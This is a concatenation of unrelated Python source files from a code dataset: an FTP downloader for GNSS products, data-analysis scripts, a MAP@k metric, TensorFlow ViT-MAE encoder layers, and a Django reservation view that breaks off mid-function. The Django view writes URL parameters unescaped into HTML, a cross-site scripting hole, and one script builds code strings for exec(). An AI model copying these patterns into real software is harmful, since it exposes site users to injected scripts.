shutil.copyfile(srcfile, dstfile)  # copy the file\n        # print(\"copy %s -> %s\" % (srcfile, dstfile))\n\n\nclass Config(object):\n    def __init__(self, config_path):\n        if not is_file_exist(config_path):\n            exit()\n\n        self.__config_path = config_path\n        self._config = configparser.ConfigParser()\n        self._config.read(self.__config_path)\n        self.current_date = GPST0\n        self.start_date = GPST0\n        self.end_date = GPST0\n        self.max_try_num = 20\n        self.sleep_second = 7\n        self.user = ''\n        self.password = ''\n\n    def read_config_part(self, product):\n        self.product = product\n        cfg = self._config[product]\n        if product == 'ctrl':\n            pass\n            return True\n        self.flag = bool(int(cfg['download']))\n        if self.flag is False:\n            return False\n        try:\n            self.mode = cfg['mode']\n        except:\n            pass\n        else:\n            if self.mode == 'auto':\n                self.delay = int(cfg['delay'])\n                self.start_date = datetime.datetime.utcnow() - datetime.timedelta(days=self.delay)\n                self.start_date = datetime.datetime(self.start_date.year, self.start_date.month, self.start_date.day, 0,\n                                                    0, 0)\n                self.end_date = self.start_date\n            elif self.mode == 'hand':\n                self.start_date = datetime.datetime.strptime(cfg['start_date'], '%Y%m%d')\n                self.end_date = datetime.datetime.strptime(cfg['end_date'], '%Y%m%d')\n        self.ftp = cfg['ftp']\n        try:\n            self.user = cfg['user']\n            self.password = cfg['password']\n        
except:\n pass\n self.dest = cfg['dir']\n return True\n\n\nclass Session(object):\n def __init__(self):\n self.path = None\n self.host = None\n self.session = None # so quit_ftp() is safe before login_ftp() has run\n\n def login_ftp(self, ftp, user, password):\n # parse ftp\n ftp_scheme = parse.urlparse(ftp)\n self.host = ftp_scheme.netloc\n self.path = ftp_scheme.path\n\n # ftp session\n self.session = FTP(self.host, timeout=120)\n # self.session.set_debuglevel(1)\n # session.set_pasv(False)\n self.session.login(user, password)\n self.session.cwd(self.path)\n\n def quit_ftp(self):\n if self.session is None:\n return\n self.session.quit()\n\n\nclass DownloadFTP(object):\n def __init__(self, config_path):\n if config_path != '':\n self.configFTP = Config(config_path)\n self.sessionFTP = Session()\n\n def download(self):\n \"\"\"Download.\"\"\"\n for product in self.configFTP._config.sections():\n if self.configFTP.read_config_part(product):\n print('%s downloading......' % self.configFTP.product)\n self.sessionFTP.login_ftp(self.configFTP.ftp, self.configFTP.user, self.configFTP.password)\n self._download_product()\n self.sessionFTP.quit_ftp()\n print('complete\\n')\n\n def _download_product(self):\n self.configFTP.current_date = self.configFTP.start_date\n while self.configFTP.current_date <= self.configFTP.end_date:\n if self.configFTP.product in ['sp3', 'clk']:\n dest = os.path.join(self.configFTP.dest, '%d' % self.configFTP.current_date.year)\n if not os.path.isdir(dest):\n os.makedirs(dest)\n week, weekday = get_gps_weekday(self.configFTP.current_date)\n product_name = 'gbm%s%s.%s.Z' % (week, weekday, self.configFTP.product)\n source = ['%s/%d' % (self.sessionFTP.path, week)]\n self._download_file(self.sessionFTP.session, product_name, source, dest)\n elif self.configFTP.product in ['CODG', 'COPG']:\n dest = os.path.join(self.configFTP.dest, '%d' % self.configFTP.current_date.year)\n if not os.path.isdir(dest):\n os.makedirs(dest)\n product_name = '%s%03d0.%02dI.Z' % (\n self.configFTP.product, self.configFTP.current_date.timetuple().tm_yday,\n self.configFTP.current_date.year % 100)\n source = [('%s/%d' % (self.sessionFTP.path, self.configFTP.current_date.year)),\n ('%s' % self.sessionFTP.path)]\n self._download_file(self.sessionFTP.session, product_name, source, dest)\n elif self.configFTP.product in ['COD-DCB', 'CAS-DCB']:\n if not os.path.isdir(self.configFTP.dest):\n os.makedirs(self.configFTP.dest)\n source = ['%s/%d' % (self.sessionFTP.path, self.configFTP.current_date.year)]\n\n if self.configFTP.product == 'CAS-DCB':\n product_name = 'CAS0MGXRAP_%d%03d0000_01D_01D_DCB.BSX.gz' % (\n self.configFTP.current_date.year, self.configFTP.current_date.timetuple().tm_yday)\n self._download_file(self.sessionFTP.session, product_name, source, self.configFTP.dest)\n if not os.path.isfile(os.path.join(self.configFTP.dest, product_name).replace('.gz', '')):\n self.configFTP.current_date += datetime.timedelta(days=1)\n continue\n extractDCBFromSNX.extractDCBFromSNX(\n os.path.join(self.configFTP.dest, product_name).replace('.gz', ''),\n self.configFTP.dest, True)\n for i in ['C1', 'P2', 'P3']:\n old_file = os.path.join(self.configFTP.dest, 'P1%s%02d%02d%02d.DCB' % (\n i, self.configFTP.current_date.year % 100, self.configFTP.current_date.month,\n self.configFTP.current_date.day))\n new_file = os.path.join(os.path.split(self.configFTP.dest)[0],\n 'P1%s%02d%02d.DCB' % (i, self.configFTP.current_date.year % 100,\n self.configFTP.current_date.month))\n copy_file(old_file, new_file)\n elif self.configFTP.product == 'COD-DCB':\n for i in ['C1', 'P2']:\n product_name = 
'P1%s%02d%02d.DCB.Z' % (\n i, self.configFTP.current_date.year % 100, self.configFTP.current_date.month)\n self._download_file(self.sessionFTP.session, product_name, source, self.configFTP.dest)\n elif self.configFTP.product in ['brdm']:\n dest = os.path.join(self.configFTP.dest, '%d' % self.configFTP.current_date.year)\n if not os.path.isdir(dest):\n os.makedirs(dest)\n source = ['%s/%d/brdm' % (self.sessionFTP.path, self.configFTP.current_date.year)]\n product_name = '%s%03d0.%02dp.Z' % (\n self.configFTP.product, self.configFTP.current_date.timetuple().tm_yday,\n self.configFTP.current_date.year % 100)\n self._download_file(self.sessionFTP.session, product_name, source, dest)\n elif self.configFTP.product in ['sit_all']:\n dest = self.configFTP.dest\n if not os.path.isdir(dest):\n os.makedirs(dest)\n source = [self.sessionFTP.path]\n product_name = 'sit_all.xyz'\n self._download_file(self.sessionFTP.session, product_name, source, dest, is_uncompress=False, is_delete=False)\n product_name = 'sit_all.inf'\n self._download_file(self.sessionFTP.session, product_name, source, dest, is_uncompress=False, is_delete=False)\n self.configFTP.current_date += datetime.timedelta(days=1)\n\n def _download_file(self, session, product_name, source, dest, is_uncompress=True, is_delete=True):\n \"\"\"Download file.\"\"\"\n print(' try to download %s' % product_name)\n for i in source:\n try:\n self.sessionFTP.session.cwd(i)\n if product_name not in session.nlst():\n raise BaseException\n break\n except:\n continue\n else:\n print(' %s does not exist' % product_name)\n return\n file_path = os.path.join(dest, product_name)\n try_num = self.configFTP.max_try_num\n while try_num > 0:\n try:\n with open(file_path, 'wb') as f:\n session.retrbinary('RETR %s' % product_name, f.write)\n except:\n try_num -= 1\n print(' sleep %ds and try again (No.%d)' % (\n self.configFTP.sleep_second, self.configFTP.max_try_num - try_num))\n time.sleep(self.configFTP.sleep_second)\n else:\n if is_uncompress:\n uncompress(file_path, is_delete=is_delete)\n print(' success')\n break\n else:\n print(' fail')\n\n\nif __name__ == '__main__':\n config_path = os.path.join(os.path.dirname(__file__), 'configure.ini')\n downloader = DownloadFTP(config_path)\n downloader.download()\n","repo_name":"Jin-Whu/Download","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":10873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14733782142","text":"import numpy as np\nimport pandas as pd\n\n\n# Loading Data\ns = set()\ns.add('occupancy_6005')\ns.add('occupancy_t4013')\ns.add('speed_6005')\ns.add('speed_7578')\ns.add('speed_t4013')\ns.add('TravelTime_387')\ns.add('TravelTime_451')\n\n# dynamically create one hourly-resampled DataFrame variable per series name\nfor x in s:\n exec(x + \" = pd.read_csv(filepath_or_buffer='Data/Traffic/\" + x + \".csv', parse_dates=True, index_col='timestamp')\")\n exec(x + \" = \" + x + \".rename(columns={'value': x})\")\n exec(x + \" = \" + x + \".resample('H').mean()\")\n","repo_name":"CarlosLing/Algoritms","sub_path":"Traffic/Main_EDTW.py","file_name":"Main_EDTW.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8917792403","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 19 16:27:19 2022\n\n@author: UT\n\"\"\"\n\n# 3rd party\nimport numpy as np\n\n# package\nfrom pymls import Lattice, Dislocation, Stroh, MLS\nfrom pymls.elastic import cij_from_group\nfrom pymls.toolbox import abt\n\n\n# - 1. 
crystal lattice\nscalar = (1, 1, 1, 60, 90, 120)\n\n# - 2. slip system\nhkl = np.array((0,0,1)) # BCC slip plane\nuvw = np.array((1,0,0)) # burgers vector\nl = np.array((0,1,0)) # dislocation line vector\nphi = abt(uvw, l, degrees=True) # 90 degrees == edge dislocation\n\n# - 3. elastic constituents\nC = cij_from_group(116.3, 64.8, 30.9, group='m-3m') # GPa\n\n# - 4. class instances\nL = Lattice.from_scalar( scalar ) \nD = Dislocation(lattice=L, hkl=hkl, uvw=uvw, phi=phi, SGno=None)\nS = Stroh(C) # captures characteristic elastic matrix and eigensolution\nI = MLS(dislocation=D, cij=C) # captures sum computation\n\n# - 5. viz\nfig, ax = D.visualize()\n\n\n\n\n# - \ndef MLS_M(lattice):\n \"\"\" eqn. 1 \"\"\"\n D = lattice\n R = lattice.reciprocal\n cos = np.cos(D.angles * np.pi/180)\n sin = np.sin(D.angles * np.pi/180)\n cosstar = np.cos(R.angles * np.pi/180)\n M = np.array((\n (1/D.a , 0 , 0 ),\n (-cos[2] / (D.a*sin[2]), 1 / (D.b * sin[2]), 0 ),\n (R.a * cosstar[1] , R.b * cosstar[0] , R.c)\n ))\n return M\n \n\n\ndef vol_from_scalar(a,b,c,al,be,ga):\n cosa = np.cos(al*np.pi/180)\n cosb = np.cos(be*np.pi/180)\n cosg = np.cos(ga*np.pi/180)\n return a*b*c*np.sqrt(1 + 2*cosa*cosb*cosg - cosa**2 - cosb**2 - cosg**2)\n\n\n# =============================================================================\n# \n# M = MLS_M(L)\n# L = Lattice(M)\n# D = Dislocation(lattice=L, hkl=hkl, uvw=uvw, phi=phi)\n# C2 = MLS(D, C)\n# \n# =============================================================================\n","repo_name":"PetMetz/pymls","sub_path":"examples/nonorthogonal_nonphysical.py","file_name":"nonorthogonal_nonphysical.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44570040822","text":"from dataclasses import dataclass\nfrom typing import List\n\nfrom sample.data_processing.data_classes import VesselTrip\nfrom sample.general.interval_manipulation import merge_intervals, total_interval_time, find_overlap, Interval\n\n\ndef get_direction(path):\n \"\"\" Get the direction of a path that goes to Fork-narrow. \"\"\"\n for i, (loc, dur) in enumerate(path):\n if loc == \"Fork_narrow\":\n if i > 0:\n prev_loc = path[i - 1][0]\n if \"AK4\" == prev_loc:\n return \"canal\"\n elif \"AK5\" == prev_loc:\n return \"harbor\"\n elif i < len(path) - 1:\n next_loc = path[i + 1][0]\n if \"AK4\" == next_loc:\n return \"harbor\"\n elif \"AK5\" == next_loc:\n return \"canal\"\n return \"no\"\n\n\ndef get_time_at_location(vt: VesselTrip, loc_name: str) -> Interval:\n \"\"\" Return the start and end timestamp (POSIX) when this trip in the indicated location. \"\"\"\n cum_dur = 0\n valid = False\n fork_dur = 0\n for loc, dur in vt.get_path():\n if loc == loc_name:\n valid = True\n fork_dur = dur\n break\n cum_dur += dur\n\n if not valid:\n return 0, 0\n\n start_time = vt.trip[0].time.timestamp()\n fork_start = start_time + cum_dur\n fork_end = start_time + cum_dur + fork_dur\n\n return fork_start, fork_end\n\n\n@dataclass\nclass ForkOverlap:\n vessel_first: VesselTrip\n vessel_second: VesselTrip\n overlap_duration: float\n overlap_start: float\n same_direction: bool\n\n\ndef get_throughput_fork(vts: List[VesselTrip]):\n \"\"\" Calculate the throughput in several areas by evaluating the time there is at least one ship present. 
\"\"\"\n vts = [vt for vt in vts if\n 7 <= vt.trip[0].time.hour and vt.trip[-1].time.hour <= 17 and vt.trip[0].time.dayofweek < 5]\n vts = sorted(vts, key=lambda t: t.trip[0].time)\n\n vesseltrips_to_canal = []\n vesseltrips_to_harbor = []\n for vt in vts:\n path = vt.get_path()\n if get_direction(path) == \"canal\":\n vesseltrips_to_canal.append(vt)\n elif get_direction(path) == \"harbor\":\n vesseltrips_to_harbor.append(vt)\n\n fork_to_canal = merge_intervals([get_time_at_location(vt, \"Fork_narrow\") for vt in vesseltrips_to_canal])\n fork_to_harbor = merge_intervals([get_time_at_location(vt, \"Fork_narrow\") for vt in vesseltrips_to_harbor])\n\n ak5_times = merge_intervals([get_time_at_location(vt, \"AK5\") for vt in vesseltrips_to_canal])\n intersection_times = merge_intervals([get_time_at_location(vt, \"Intersection\") for vt in vesseltrips_to_canal])\n\n total_time = 3600 * 10 * len({vt.trip[0].time.dayofyear for vt in vts})\n\n print(len(vesseltrips_to_harbor), len(vesseltrips_to_canal), len(fork_to_canal), len(fork_to_harbor))\n print(len(find_overlap(fork_to_canal, fork_to_harbor)))\n\n vals = [total_interval_time(fork_to_canal),\n total_interval_time(fork_to_harbor),\n total_interval_time(find_overlap(fork_to_canal, fork_to_harbor)),\n total_interval_time(merge_intervals(fork_to_canal + fork_to_harbor)),\n total_interval_time(ak5_times),\n total_interval_time(intersection_times)]\n descriptions = [\"Vork - richting kanaal\", \"Vork - richting Haven\", \"Vork kruisende schepen\", \"Vork totaal\",\n \"AK5\", \"Kruispunt\"]\n print(vals)\n print(total_time)\n for v, d in zip(vals, descriptions):\n print(f\"{d:25s} & {v:9d} & {100 * v / total_time:6.1f}\\\\% \\\\\\\\\")\n","repo_name":"UGent-DNA/WaterwaySimulation","sub_path":"sample/analysis/capacity_analysis.py","file_name":"capacity_analysis.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36970223229","text":"from ..metric import Metric\n\nimport numpy as np\n\nclass MAP(Metric):\n # reference: https://github.com/benhamner/Metrics/blob/master/Python/ml_metrics/average_precision.py\n def init(self, k : int, relevance_threshold=0):\n super().init(k, relevance_threshold)\n\n def name(self):\n return f'MAP@{self.k}'\n \n def eval(self, ratings, recommendations):\n relevant_items = self._get_relevant_ratings(ratings)\n users_apk = [self._apk(set(rel_items), recommendations[u]) for u, rel_items in relevant_items.items()]\n return np.mean(users_apk)\n \n def _apk(self, rel_items, recommendations):\n if len(recommendations) > self.k:\n recommendations = recommendations[:self.k]\n \n score = 0.0\n num_hits = 0.0\n\n if not rel_items:\n return score\n\n for i, rec in enumerate(recommendations):\n if rec in rel_items and rec not in recommendations[:i]:\n num_hits += 1.0\n score += num_hits/(i+1.0)\n\n return score/min(len(rel_items), self.k)","repo_name":"AlvaroJoseLopes/Knowledge-Graph-aware-Recommender-Systems-with-DBpedia","sub_path":"framework/evaluator/metrics/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32260864505","text":"import math\nfrom typing import Optional, Tuple, Union\n\nimport numpy as np\nimport tensorflow as tf\nfrom transformers.activations_tf import get_tf_activation\nfrom transformers.file_utils import ModelOutput\nfrom transformers.modeling_tf_outputs import 
TFBaseModelOutput\nfrom transformers.modeling_tf_utils import TFModelInputType, get_initializer\nfrom transformers.tf_utils import shape_list, stable_softmax\n\nfrom .embeddings import ViTMAEEmbeddings\n\n###############################################################################\n# Model Output Data Class\n###############################################################################\n\n\nclass TFViTMAEModelOutput(ModelOutput):\n \"\"\"\n Class for TFViTMAEModel's outputs, with potential hidden states and attentions.\n Args:\n cls_token_output (`tf.Tensor` of shape `(batch_size, hidden_size)`):\n This is the output from the CLS Token.\n last_hidden_state (`tf.Tensor` of shape `(batch_size, sequence_length, hidden_size)`):\n Sequence of hidden-states at the output of the last layer of the model.\n mask (`tf.Tensor` of shape `(batch_size, sequence_length)`):\n Tensor indicating which patches are masked (1) and which are not (0).\n ids_restore (`tf.Tensor` of shape `(batch_size, sequence_length)`):\n Tensor containing the original index of the (shuffled) masked patches.\n hidden_states (`tuple(tf.Tensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):\n Tuple of `tf.Tensor` (one for the output of the embeddings + one for the output of each layer) of shape\n `(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer plus\n the initial embedding outputs.\n attentions (`tuple(tf.Tensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):\n Tuple of `tf.Tensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,\n sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in\n the self-attention heads.\n \"\"\"\n\n cls_token_output: tf.Tensor = None\n last_hidden_state: tf.Tensor = None\n mask: tf.Tensor = None\n ids_restore: tf.Tensor = None\n hidden_states: Optional[Tuple[tf.Tensor]] = None\n attentions: Optional[Tuple[tf.Tensor]] = None\n\n\n###############################################################################\n# Self Attention and Attention\n###############################################################################\n\n\nclass TFViTMAESelfAttention(tf.keras.layers.Layer):\n \"\"\"The multi head self attention module.\"\"\"\n\n def __init__(self, config, **kwargs):\n super().__init__(**kwargs)\n\n # The hidden size must be divisible by the number of heads to facilitate\n # multi-heads attention.\n if config.hidden_size % config.num_attention_heads != 0:\n raise ValueError(\n f\"The hidden size ({config.hidden_size}) is not a multiple of the number \"\n f\"of attention heads ({config.num_attention_heads})\"\n )\n\n self.num_attention_heads = config.num_attention_heads\n self.attention_head_size = int(config.hidden_size / config.num_attention_heads)\n self.all_head_size = self.num_attention_heads * self.attention_head_size\n self.sqrt_att_head_size = math.sqrt(self.attention_head_size)\n\n self.query = tf.keras.layers.Dense(\n units=self.all_head_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"query\",\n )\n self.key = tf.keras.layers.Dense(\n units=self.all_head_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"key\",\n )\n self.value = tf.keras.layers.Dense(\n units=self.all_head_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"value\",\n )\n self.dropout = 
tf.keras.layers.Dropout(rate=config.attention_probs_dropout_prob)\n\n def transpose_for_scores(self, tensor: tf.Tensor, batch_size: int) -> tf.Tensor:\n # Reshape from [batch_size, seq_length, all_head_size] to [batch_size, seq_length, num_attention_heads, attention_head_size]\n tensor = tf.reshape(\n tensor=tensor,\n shape=(batch_size, -1, self.num_attention_heads, self.attention_head_size),\n )\n\n # Transpose the tensor from [batch_size, seq_length, num_attention_heads, attention_head_size] to\n # [batch_size, num_attention_heads, seq_length, attention_head_size]\n return tf.transpose(tensor, perm=[0, 2, 1, 3])\n\n def call(\n self,\n hidden_states: tf.Tensor,\n head_mask: tf.Tensor,\n output_attentions: bool,\n training: bool = False,\n ) -> Tuple[tf.Tensor]:\n batch_size = shape_list(hidden_states)[0]\n\n mixed_query_layer = self.query(inputs=hidden_states)\n mixed_key_layer = self.key(inputs=hidden_states)\n mixed_value_layer = self.value(inputs=hidden_states)\n\n query_layer = self.transpose_for_scores(mixed_query_layer, batch_size)\n key_layer = self.transpose_for_scores(mixed_key_layer, batch_size)\n value_layer = self.transpose_for_scores(mixed_value_layer, batch_size)\n\n # Take the dot product between \"query\" and \"key\" to get the raw attention scores.\n attention_scores = tf.matmul(query_layer, key_layer, transpose_b=True)\n dk = tf.cast(self.sqrt_att_head_size, dtype=attention_scores.dtype)\n attention_scores = tf.divide(attention_scores, dk)\n\n # Normalize the attention scores to probabilities.\n attention_probs = stable_softmax(logits=attention_scores, axis=-1)\n\n # This is actually dropping out entire tokens to attend to, which might\n # seem a bit unusual, but is taken from the original Transformer paper.\n attention_probs = self.dropout(inputs=attention_probs, training=training)\n\n # Mask heads if we want to\n if head_mask is not None:\n attention_probs = tf.multiply(attention_probs, head_mask)\n\n attention_output = tf.matmul(attention_probs, value_layer)\n attention_output = tf.transpose(attention_output, perm=[0, 2, 1, 3])\n\n # (batch_size, seq_len_q, all_head_size)\n attention_output = tf.reshape(\n tensor=attention_output, shape=(batch_size, -1, self.all_head_size)\n )\n outputs = (\n (attention_output, attention_probs)\n if output_attentions\n else (attention_output,)\n )\n\n return outputs\n\n\nclass TFViTMAESelfOutput(tf.keras.layers.Layer):\n \"\"\"\n The residual connection is defined in TFViTMAELayer instead of here\n (as is the case with other models), due to the layernorm applied\n before each block.\n \"\"\"\n\n def __init__(self, config, **kwargs):\n super().__init__(**kwargs)\n\n self.dense = tf.keras.layers.Dense(\n units=config.hidden_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"dense\",\n )\n self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)\n\n def call(self, hidden_states: tf.Tensor, training: bool = False) -> tf.Tensor:\n hidden_states = self.dense(inputs=hidden_states)\n hidden_states = self.dropout(inputs=hidden_states, training=training)\n\n return hidden_states\n\n\nclass TFViTMAEAttention(tf.keras.layers.Layer):\n def __init__(self, config, **kwargs):\n super().__init__(**kwargs)\n\n self.self_attention = TFViTMAESelfAttention(config, name=\"attention\")\n self.dense_output = TFViTMAESelfOutput(config, name=\"output\")\n\n def call(\n self,\n input_tensor: tf.Tensor,\n head_mask: tf.Tensor,\n output_attentions: bool,\n training: bool = False,\n ) -> Tuple[tf.Tensor]:\n self_outputs 
= self.self_attention(\n hidden_states=input_tensor,\n head_mask=head_mask,\n output_attentions=output_attentions,\n training=training,\n )\n attention_output = self.dense_output(\n hidden_states=self_outputs[0], training=training\n )\n outputs = (attention_output,) + self_outputs[1:]\n\n return outputs\n\n\n###############################################################################\n# Intermediate Layers\n###############################################################################\n\n\nclass TFViTMAEIntermediate(tf.keras.layers.Layer):\n def __init__(self, config, **kwargs):\n super().__init__(**kwargs)\n\n self.dense = tf.keras.layers.Dense(\n units=config.intermediate_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"dense\",\n )\n\n if isinstance(config.hidden_act, str):\n self.intermediate_act_fn = get_tf_activation(config.hidden_act)\n else:\n self.intermediate_act_fn = config.hidden_act\n\n def call(self, hidden_states: tf.Tensor) -> tf.Tensor:\n hidden_states = self.dense(inputs=hidden_states)\n hidden_states = self.intermediate_act_fn(hidden_states)\n\n return hidden_states\n\n\nclass TFViTMAEOutput(tf.keras.layers.Layer):\n def __init__(self, config, **kwargs):\n super().__init__(**kwargs)\n\n self.dense = tf.keras.layers.Dense(\n units=config.hidden_size,\n kernel_initializer=get_initializer(config.initializer_range),\n name=\"dense\",\n )\n self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)\n\n def call(\n self, hidden_states: tf.Tensor, input_tensor: tf.Tensor, training: bool = False\n ) -> tf.Tensor:\n hidden_states = self.dense(inputs=hidden_states)\n hidden_states = self.dropout(inputs=hidden_states, training=training)\n hidden_states = hidden_states + input_tensor\n\n return hidden_states\n\n\n###############################################################################\n# MAE Layer\n###############################################################################\n\n\nclass TFViTMAELayer(tf.keras.layers.Layer):\n \"\"\"This corresponds to the Block class in the timm implementation.\"\"\"\n\n def __init__(self, config, **kwargs):\n super().__init__(**kwargs)\n\n self.attention = TFViTMAEAttention(config, name=\"attention\")\n self.intermediate = TFViTMAEIntermediate(config, name=\"intermediate\")\n self.vit_output = TFViTMAEOutput(config, name=\"output\")\n\n self.layernorm_before = tf.keras.layers.LayerNormalization(\n epsilon=config.layer_norm_eps, name=\"layernorm_before\"\n )\n self.layernorm_after = tf.keras.layers.LayerNormalization(\n epsilon=config.layer_norm_eps, name=\"layernorm_after\"\n )\n\n def call(\n self,\n hidden_states: tf.Tensor,\n head_mask: tf.Tensor,\n output_attentions: bool,\n training: bool = False,\n ) -> Tuple[tf.Tensor]:\n attention_outputs = self.attention(\n # in ViTMAE, layernorm is applied before self-attention\n input_tensor=self.layernorm_before(inputs=hidden_states),\n head_mask=head_mask,\n output_attentions=output_attentions,\n training=training,\n )\n attention_output = attention_outputs[0]\n\n # first residual connection\n hidden_states = attention_output + hidden_states\n\n # in ViTMAE, layernorm is also applied after self-attention\n layer_output = self.layernorm_after(inputs=hidden_states)\n\n intermediate_output = self.intermediate(hidden_states=layer_output)\n\n # second residual connection is done here\n layer_output = self.vit_output(\n hidden_states=intermediate_output,\n input_tensor=hidden_states,\n training=training,\n )\n outputs = (layer_output,) + 
attention_outputs[\n 1:\n ] # add attentions if we output them\n\n return outputs\n\n\n###############################################################################\n# Encoder Layer\n###############################################################################\n\n\nclass TFViTMAEEncoder(tf.keras.layers.Layer):\n def __init__(self, config, **kwargs):\n super().__init__(**kwargs)\n\n self.layer = [\n TFViTMAELayer(config, name=f\"layer_._{i}\")\n for i in range(config.num_hidden_layers)\n ]\n\n def call(\n self,\n hidden_states: tf.Tensor,\n head_mask: tf.Tensor,\n output_attentions: bool,\n output_hidden_states: bool,\n return_dict: bool,\n training: bool = False,\n ) -> Union[TFBaseModelOutput, Tuple[tf.Tensor]]:\n all_hidden_states = () if output_hidden_states else None\n all_attentions = () if output_attentions else None\n\n for i, layer_module in enumerate(self.layer):\n if output_hidden_states:\n all_hidden_states = all_hidden_states + (hidden_states,)\n\n layer_outputs = layer_module(\n hidden_states=hidden_states,\n head_mask=head_mask[i],\n output_attentions=output_attentions,\n training=training,\n )\n hidden_states = layer_outputs[0]\n\n if output_attentions:\n all_attentions = all_attentions + (layer_outputs[1],)\n\n # Add last layer\n if output_hidden_states:\n all_hidden_states = all_hidden_states + (hidden_states,)\n\n if not return_dict:\n return tuple(\n v\n for v in [hidden_states, all_hidden_states, all_attentions]\n if v is not None\n )\n\n return TFBaseModelOutput(\n last_hidden_state=hidden_states,\n hidden_states=all_hidden_states,\n attentions=all_attentions,\n )\n","repo_name":"ayulockin/TF-MSN","sub_path":"msn/model/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":14097,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"13600910245","text":"import traceback\nimport logging\n\nfrom django.http import HttpRequest\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect\nfrom frontpage.models import Article, ArticleGroup, GroupReservation, Profile\nfrom frontpage.management.page_skeleton import render_headbar, render_footer\nfrom frontpage.management.form import Form, NumberField, TextArea, SubmitButton, PlainText\nfrom frontpage.management.magic import get_article_pcs_free\nfrom frontpage.uitools.body import get_type_string, render_price\nfrom ..magic import get_current_user\nfrom ..grouptools.edit_group import get_article_dict\n\n\nlogger = logging.getLogger(__file__)\n\n\ndef get_group_variations(grp: ArticleGroup):\n sizes = []\n types = []\n for article in Article.objects.all().filter(group=grp):\n if article.size not in sizes:\n sizes.append(article.size)\n if article.type not in types:\n types.append(article.type)\n sizesstr = \"\"\n typesstr = \"\"\n sizes.sort()\n types.sort()\n for s in sizes:\n sizesstr += \" \" + s\n for t in types:\n typesstr += \" \" + get_type_string(t)\n return sizesstr + \" \", typesstr + \" \"\n\ndef render_article_selection_page(request: HttpRequest):\n rid: str = str(request.GET.get(\"rid\"))\n known_groups = []\n page = 1\n if request.GET.get('page'):\n page = int(request.GET['page'])\n items_per_page = 50\n if request.GET.get('objects'):\n items_per_page = int(request.GET[\"objects\"])\n total_items = Article.objects.all().filter(visible=True).filter(underConstruction=False).count()\n max_page = total_items / items_per_page\n if max_page < 1:\n max_page = 1\n if page > max_page:\n page = max_page\n start_range = 1 + page * 
items_per_page\n if start_range > total_items:\n start_range = 0\n end_range = (page + 1) * items_per_page\n a = render_headbar(request, title=\"Select article\")\n a += '<div class=\"w3-row w3-padding-64 w3-twothird w3-container\">'\n a += '<h3>Please select your desired article</h3><table><tr><th>Select</th><th>Preview</th>' \\\n + '<th>Title</th><th>Size</th><th>Type</th></tr>'\n objects = Article.objects.filter(visible=True).filter(underConstruction=False).filter(pk__range=(start_range, end_range))\n for article in objects:\n group = article.group\n if group is None:\n s: str = None\n p = article.flashImage\n if p:\n s = p.lowResFile\n else:\n s = \"/staticfiles/frontpage/no-image.png\"\n a += '<tr><td><a href=\"/admin/reservations/article-detail-select?article_id=' + str(article.pk)\n if request.GET.get(\"srid\"):\n a += '&srid=' + str(request.GET[\"srid\"])\n a += '&rid=' + rid + '\"><img src=\"/staticfiles/frontpage/order-article.png\" class=\"button-img\"/>' + \\\n '</a></td><td><img src=\"'\n a += s + '\" /></td><td>' + article.description + '</td><td>' + article.size + '</td><td>' + \\\n get_type_string(article.type) + '</td></tr>'\n elif group not in known_groups:\n known_groups.append(group)\n s: str = None\n p = group.group_flash_image\n if p:\n s = p.lowResFile\n else:\n s = \"/staticfiles/frontpage/no-image.png\"\n sizes, types = get_group_variations(group)\n a += '<tr><td><a href=\"/admin/reservations/article-detail-select?article_id=' + str(article.pk)\n if request.GET.get(\"srid\"):\n a += '&srid=' + str(request.GET[\"srid\"])\n a += '&rid=' + rid + '\"><img src=\"/staticfiles/frontpage/order-article.png\" ' + \\\n 'class=\"button-img\"/></a></td><td><img src=\"'\n a += s + '\" /></td><td>' + group.group_name + '</td><td>' + sizes + '</td><td>' + \\\n types + '</td></tr>'\n a += '</table>'\n if page > 1:\n a += '<a href=\"' + request.path + '?page=' + str(page - 1) + '&objects=' + str(items_per_page) + \\\n '\" class=\"button\">Previous page </a>'\n if page < max_page:\n a += '<a href=\"' + request.path + '?page=' + str(page + 1) + '&objects=' + str(items_per_page) + \\\n '\" class=\"button\">Next page </a>'\n a += '</div>' + render_footer(request)\n return HttpResponse(a)\n\n\ndef render_detail_selection(request: HttpRequest):\n try:\n res: GroupReservation = None\n user: Profile = None\n try:\n res = GroupReservation.objects.get(id=int(request.GET[\"rid\"]))\n user = get_current_user(request)\n if res.createdByUser != user and user.rights < 2:\n raise Exception(\"Editing foreign reservation\")\n except Exception as e:\n logger.warning(\"\\nUser \" + str(user) + \" from IP \" + str(request.META['REMOTE_ADDR']) + \\\n \" caused an exception: \" + traceback.format_exc() + \"\\n\\n\")\n return redirect(\"/admin/?msgid=editreservation.invalidrequest;\" + str(e))\n a: Article = Article.objects.get(pk=int(request.GET[\"article_id\"]))\n if \"rid\" not in request.GET:\n raise 